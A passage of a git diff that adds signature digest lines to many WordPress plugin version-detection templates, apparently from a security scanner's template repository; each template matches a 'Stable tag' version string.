end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1..4c1c834edd 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100858b173ab938da480917c36ded63ef50e1e669c4646e52e2d318da5971f4f73002204180560541ce40fc3c7d086faeb3cd507c6b0bee1bb35067441554a68b8d687d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2..d9459b0fab 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210098e63f19d9351cdc29e0b2d05a4ae17d4a585275fc00ebf32c891b6b1b2b3462022069c3997c900ae599f731dbf79dad10fe9945f8267cd02dd67703046023e669b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0..656c9ad6f9 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206a2a8dc2393209f7ac5feac1eb0c597de85e701fc35cf232aafc7514e88a704702205ac1230312e8eeac6ae300a66c1521e243f0b0931bba847cb0dbb213b2fdf28e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca..d6623579cf 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220499f6618feaa0a1562b30b68faca8cf2afc6c8fe6e49a5e9615568e25f3b2fbd022100f27b15eb505ba12936a1eb58269d9f22afd8f3dfeaf9b8e89754afe35498af36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5df..c0e7d90e4c 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200a73b335c17c9df0520a64dbd9a0a9611c6688f6720cb1f4baca734263f553cb0220456270f9fae25ae2de55e0f16217a4d5a5f4864ea43b8937b8ea455669848e61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f..142ad876eb 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bb7b0a1ebd65ae8dd2d4ea7237cf40c79e3b6cf9b92ab4bd69ed2f1b828e987a02203e50458edae9c1e2b671a0bf64fafa2a2273ed7f1d185ade7497b9278f9b3a15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e..e0fa3f37b1 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210093946d3a6367fc4c60e0101fae7fa8ce5aab4c452826a6f1436e3fcb5a4237f20221008e177214dbfbbf7db96e1938e6cc48f8eeab9bf3681d7bc75950f76d010d5571:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e..84f985db7e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c9e429ddc13b164062c9a3ebffd3539a04a53b72162be2434f5c45dd4fca58ab02210083933f05eaea657ca6b0f6def9ba3899ab8d63910f0a0b0c5227b952adca3afc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4f..0fc7039e02 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ed7d05fb8e5d1aa0a472a1cf5e45b45bb9cefffe77521d87ba56a92c914c32ab0220575a74b3bdce4ca8203e505104117950444446f86b396f04d4c5c226cdcaf2ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e..2c886aa65c 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dc4be198102919aea77ecfec5af78fda600dd8ce0f198487f369bbf0a94a3f7302203083b289994588a8384f85497ef1a7f02cb3f7e072f435de6c24591d5f8f01f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f9..147c50bb11 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022064f69f09ea3b353ff2e0bac812dfcf7cebdbeacf21121034f515a4b4967daddf02200922ce449889ab5a8c8c3907ad4d4056818015fe04cfbe306406d299398f327a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a2..5989150e84 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203fa66c93d31732320a715a7082c540d1d820d2a6debe581e05b07bfbd555ac3502201a2c91c0bf1bd9b4be2135cd9df5e5a632c55f88f62e7fc241589ee7cb2d0667:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e4..85459bd028 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203c9f9732d457a4a9a7f9554ed8cddafeed5426c53bbabd53c44000fb775d8930022100b6cf05e8444ee5182b91bcf12b6190379b173eab3268339720d2049c95f91ffb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9df..41bbcd76bf 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022022a91f8ed401de111ddae260194cf5735d09dfb1f720fc1d7779a52431536f9e02207517f8b9bbdf36486b223c6c3b41d88b518b830f8371b1272c605d58686d43b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index d7fb2209d1..3f1e46b697 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201355fe9676039f3f3250e4ddceac44871f2f6fea4e35c1b171bab941ed5bfbd5022100961d7080d41a338f44edaa49addb894c93db8d394523160f95d6ddad82d8737a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d4632..2b697d20ef 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220324ac0c6a9a8d3908ec15590a27c137486c83cc12dcb4165834a134d531469ef022045b5b98141be780e4e7fa37b534d17fc564089ae4a8847d4910491d05116570a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c..416cddbe3c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008b7ab5d8cc81f3c1d4d2033456a7c6fc701bd260f4984c2e49ca7ad404324c97022046a407f160785ba69265aeeff380a12855abf8fd16ebe3624267eb134af056b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee1..f70e15925e 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201e5b544f81b093d248d899fe1a437cae8cab2eafdeeeee5c27f35bbade9b81c3022052ffb15bef316bf390a708ac98cc912e05d5fdfe3eb4f08f59e15745ec074f51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e4..7d27b6b133 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022048dc64b81960a36a7f20e45f411a53fbd5f5e74b08bf23893a5787edd300827e022024de8b698526e4fc0cdf787642efb4e11f8ed953e6968352b83c3a142bdee09b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a..a3539694f0 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008d2b6f44905ec8a14c337e885cccd5fff63117e03f4b5df5235832960c3ff3b50221008a7f0ad32bd5432b83da016de1046f88bd941b7b7ce953f0624a4bd1c8c25e84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 00eb1e2dfc..6a80eb4758 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d7a0fb3adcd47523bdee18be952d98531a0aaded929ef2894f788e653012ab6b0220247db716aca4d973d36d507a3efa016e2e63c863ec10e0020b9d919ada937f21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d3..11b3b8d1fd 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022049f17159b436bd198b49dbb41c930156d914a5d686c542fd5b458cf3de33f13f022057a9fe2974ee754830f3c8757320ad742151342259becc7271d1b0f33d7f9736:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 492d66db68..4ed215c438 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bb57dc3ccbb210dd8b94b7125a1266ca8698df592e3ff2d210445dd8c5b2f9780221009ff03512541f11a8ba25dd1cc597c0f89a3f632ab4cc53c8b24b781264db7cf7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3db..03175cf3f8 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205b4f0ead58ff49be7e96570a02d10f249a9f79038aa8cfcf1805797a92fbb41d022004e39de5d4764d9d0f6ff47913b781c1981ee70a62fbced48a6802b67d78acad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca38..abfd4d224c 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100acbba6745234410dbee5eaee5a5a2f8d105ac11140755101c152a5ae7fa03d87022048fa18ff48c8161e800043292de88a5baa28d786c6ec57b7ac8148f51ad38224:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255..014f65c356 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100942647332dec665ce1cad04fae5018a5e7cd1d1ae7ffb3cd4999aed034121f3a0220672f76d88e7d818cbf3d1c48d985e129620ec5a87fcf754d0c61cbfdde6fa20e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d0..1440a7bd31 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022028151623d26dd2087cc176ea35a2e78b3bb3481b29676d704b69d18c80dc750b022100dc4fe08fe5f348cbfda4a00ea465e25600e2c84cde4e4e58f3367daa60b98799:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5f5e8afed5..a19bea3922 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220045b677df2c50d796ebe7d52e6c87ec28b1c2a24d18c7777135b3089d30e62ae02203a7bb294762496657a35cade8b3d767587787cd0b69591c510b6a35777d53a69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b..b87ed2e106 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e9284e9c5c52b492d1a155c6ffa3f53a06a66cd11624c4f8ac56af1fbeb757a7022042499ecde1cbc6f351b5a855954b80ea52a12e3e219816ecf368c2d4bf105b6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3..f59c1bcfdf 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fd72b4d3fd17b7bc956ef00bad56f307aa97086e9e4bfd205347d4a25778a29b02206830a0608797f1c0164d0f51b84a58d94d94cbafb66bfac176ca9afc874ef838:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec5..14b004ec1c 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204d2651f9ed1f051cf6297122d9a98dc3ac6abff6a5ef70dd53ad8f57d82dc7220221008f9a7700a9125e5071f07ab6c538ccdd7089912bc43c36a2f60911dc94e7bb28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a220..3a2031249e 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022066c82cb7013ef4c411ce7df5f0d1aad8f6882305d2dbab8947add8ad8131e14a0220537ad570f16f3753087bf405d15d63d65e17b03beb015be0d781563c2115c111:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453..04e3b45638 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201ef42283b7950b9fc404d8647082b3cd2ff214f679150c5f0658590555c6f912022001b537e34ec0c9f975d0bc6eac0b2bcac439b54b451c48fe97eea00b0da254ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac0..f16fff505c 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100eeedf6062722ebf03aade7502fd31ac943f23d4c7b97af26e47473985ae2ae59022100a716963d0baf6d9238516c7abce7defac817c8e7b565caa54d84474824dad99f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca..09c3628c80 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fcf223dd0c7432c7777781146450dffaa442a577ec72f3538f1c7cf17e55960d02201f7fef467cf6cde8f7591573aa3f4fda75d98cb36532e582463eab3671fcee5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82d..138b88ba71 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044021f5e77810af6ca6659f468362d7aa3197e941d65647146e9be8a097ee1475e0f022100865b729e99b1d2fd38d9a0b6cf40e9180e8e31f2881fe75db9b1ae30c7fa473c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201f..af922e935d 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201dd5a2b732a1fdea8b39bc80468b547721e56bc3f958979584908970d1ec557d0220730a4aba310ddd7fbdb468c3ea40e4dcccf9177ad4c646fc7805901485afd000:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d0..36c7ec7ee9 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022000af9801b4942749a2f520e0a53702dab5cbd54ef9278408de6294d0ea7061930220788444e154ef18fb3cde86dbba56ee77f00fda7deee8a3f72fdf64b72aeabf61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78..11eb35c222 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220469e3d2ad6840b1421c796c959cc1c2d1b4e8a212ae900bc32a8964073cf72560221008804596b377e6bef26e974a8d8539cfe26922fe7bdfd2370c4acad87c508fd8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8ea..c03ecb6dd0 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202dc5d4afae672a128cbda88b3a4ee96e75b747a53a23db92d18ce3b483619ac8022061aecc2f54bad61a081ff1816a2be6d0e054ee508b7539e304b8adb79ecbd93d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e..1ad0413029 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022035fd6fcd223fcce59971a29d3874c0c2839d5c1c50c3d6a1307b05519d2441bc022100d65bfcab8152693b7d658f1a0f82da6f38e7a550f48341af0a1844fbaff3edde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 2a233f389d..111f762678 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bf8dc5d65f6442765aebc677d4600fde0320d1686767002ec1168a61ad3b9d7b02203dc7f353756675c2fd949fe665dad565659717c249c05d833f8d2d5716796b22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492..8c559e59f8 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204f55ffbcdc660dc8951f14d31b93253ab4d4538675510e5613ef0541d3532bee0220158853b309a84534f3d6436421565acc57c577e097d21b96a047b4f86eb66137:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4e5046273d..f15ccc3f3f 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204e1e3dcaf50245466425e4c845ddac23581843cd1bd6eb439faa6a5d12bf76bf02207f13f49728daa79a9f35b60d367308292b565aaf161d85cf5577f3c8afc3aa91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee7980..2d26ddaf4d 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022078abaf801558c98ed0244955b062b1bb18774b1d57264aa8e484cd60b588894402207a16854353066384e0f5459685186b34b3e4a9ee0fd7528e710c6e0759a7e8b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767..58e6513fcf 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d87e8ed9345a51008ad8ed1d640996236780573f28167ac1709575f855e38577022058518f9365306314df233dabccf03ef7dd7f2931d1505ecb11f17258d148f301:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073c..49a0aa2445 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022058d7a7b201d549d0561af6b80fa1de90169a7656e7fba54d509c16e8ae165cc6022100f75334cfdce62cc97cf12fe1b3e6dedd91c388a461871a58fcab10eec821f352:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55..764924ba48 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 